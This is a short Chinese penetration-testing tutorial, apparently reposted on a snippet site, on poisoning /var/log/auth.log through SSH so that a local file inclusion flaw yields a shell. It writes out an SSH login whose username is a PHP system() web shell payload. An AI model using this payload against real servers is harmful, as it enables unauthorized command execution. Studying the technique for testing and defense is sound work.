首页 > 代码库 > 本地文件包含被污染的SSH日志GetShell
本地文件包含被污染的SSH日志GetShell
0x01 前言
我们在渗透测试过程中常常会通过文件包含来getshell,一般会包含恶意代码的图片、污染UA或referer等HTTP头从而包含访问日志等等。这里介绍另外一种包含的方法,通过污染SSH日志的方式。
0x02 SSH日志污染
使用测试环境为ubuntu(10.168.33.174),ssh日志默认是在/var/log/auth.log下,默认其它用户是有read的权限的。
然后我们直接执行ssh ‘<?php system($_GET[c]);?>’@10.168.33.174
可以连接,但是我们不知道有没有这个账户抑或是即便存在也不清楚密码:
然后我们在ubuntu(10.168.33.174)上访问下/var/log/auth.log,发现成功将命令执行的代码写入了:
0x03 本地文件包含
略。
本地文件包含被污染的SSH日志GetShell
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。